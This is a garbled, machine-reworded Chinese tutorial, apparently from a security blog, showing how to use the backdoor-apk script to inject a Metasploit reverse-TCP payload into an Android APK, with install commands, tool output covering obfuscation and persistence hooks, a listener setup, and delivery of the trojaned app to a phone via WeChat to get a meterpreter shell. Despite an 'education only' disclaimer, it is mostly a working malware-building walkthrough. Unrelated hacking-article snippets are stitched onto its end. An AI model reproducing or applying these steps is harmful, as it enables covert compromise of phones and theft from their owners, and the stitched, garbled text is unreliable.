backdoor-apk是一个shell脚本 *** ,它简单化了向一切Android APK文档加上木马程序的全过程。此shell脚本 *** 的客户应具备Linux,Bash,Metasploit,Apktool,Android SDK, *** ali等的工作中专业知识。此shell脚本 *** 按原状出示,不出示一切方式的贷款担保,仅用以文化教育目地。
通俗化的讲:backdoor-apk 从姓名上大家就能了解它的主要用途了,没有错便是用于制做 APK 侧门的。这款专用工具应用起來十分便捷,并且作用也很强劲!话不多说,下边大家直接进入主题。
特别提示:原文中谈及的一部分技术性仅作安全学习和课堂教学主要用途,严禁不法应用!
1、更先,使我们对它开展安裝,在安裝前大家必须先安裝它的一些依靠 lib 库文件:
apt-get install lib32stdc 6 lib32ncurses5 lib32z1
2、这儿了解大家,对这种安裝的服务项目,当她们升级时已不开展了解。大家挑选 Yes 就可以!
在进行之上依靠库的安裝后然后大家就可以安裝 backdoor-apk 啦!
1、免费下载backdoor-apk
我是立即用的git下载backdoor-apk,其他 *** 还可以,比如:wget;
git clone https://github.com/dana-at-cp/backdoor-apk.git
2、免费下载进行后大家进到到其文件名称下:
cd backdoor-apk/
3、在当前目录下,我们可以见到一个脚本文件。
需注意:大家必须准备充分一个用于关联侧门的apk文件。
./backdoor-apk.sh /root/secist.apk
挑选 3 payload
LHOST:192.168.15.131
LPORT:4444
4、Android明细管理权限选择项:
[ ] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
怎么知道侧门APK是不是转化成 取得成功?
下列操作流程就算是取得成功!
[email protected]:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh BaiduBrowser.apk
________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie
[*] Running backdoor-apk.sh v0.2.3 on Mon Oct 9 16:50:06 EDT 2017
[ ] Android payload options:
1) meterpreter/reverse_http 4) shell/reverse_http
2) meterpreter/reverse_https 5) shell/reverse_https
3) meterpreter/reverse_tcp 6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[ ] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[ ] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling original APK file...done.
[ ] Keeping permissions of original project
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT *** ali files...done.
[*] Copying RAT *** ali files to new directories in original project...done.
[*] Fixing RAT *** ali files...done.
[*] Obfuscating const-string values in RAT *** ali files...done.
[*] Locating *** ali file to hook in original project...done.
[*] Adding hook in original *** ali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
[email protected]:~/Code/github/backdoor-apk/backdoor-apk#
5、取得成功实行之上实际操作后,会转化成一个关联侧门的 secist.apk 文档,默认设置被储存在 backdoor-apk>>original>>dist 文件目录下!下边大家来起动监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.131
set lport 4444
exploit
6、另外,我将转化成的含有侧门的 APK 发送到我的微信,并开展安裝开启!
7、迅速我们可以见到,我已经获得了手机上的 meterpreter shell !
简易键入一个,查询系统信息的指令:
sysinfo
/data/dvbbs7.mdb 动网论坛数据库 /databackup/dvbbs7.mdb 动网论坛数据库 /bbs/databackup/dvbbs7.mdb 动网论坛数据库...
在日常分析软件漏洞时,经常需要耗费比较长的分析时间,少则几小时,多则数天,甚至更久。因此,经常总结一些分析技巧是非常有必要的,针对不同的漏洞类型采取不同的分析思路和技巧,可以有效地提高分析速度。对于一...
什么叫Scapy? Scapy是一种十分火爆且有效的数据文件解决专用工具,能够 根据实际操作数据文件来工作中。Scapy能够 在普遍的协议书范畴内编解码数据文件,将其发送至网上,捕捉,关系推送恳求和...
电脑肉鸡的商业价值,我们应该怎样看待电脑肉鸡的价值,一起来看看下面的内容吧。 1.盗窃“肉鸡”电脑的虚拟财产 虚拟财产有:网络游戏ID帐号装备、QQ号里的Q币、联众的虚拟荣誉值等等。虚...
.net 跨站脚本攻击(XSS)漏洞的解决方案 描述: 1.跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码,当用户浏览该网页时,嵌入到网页...
昨天13:42,新浪网友@翠苑派出所 发微博:新晋奶爸报案,为了帮嗷嗷待哺的孩子找妈妈,他想尽办法,最后竟求助于网上的陌生人。陌生人称可以通过全球定位的网站找到妈妈,需要的只是妈妈的手机号和800...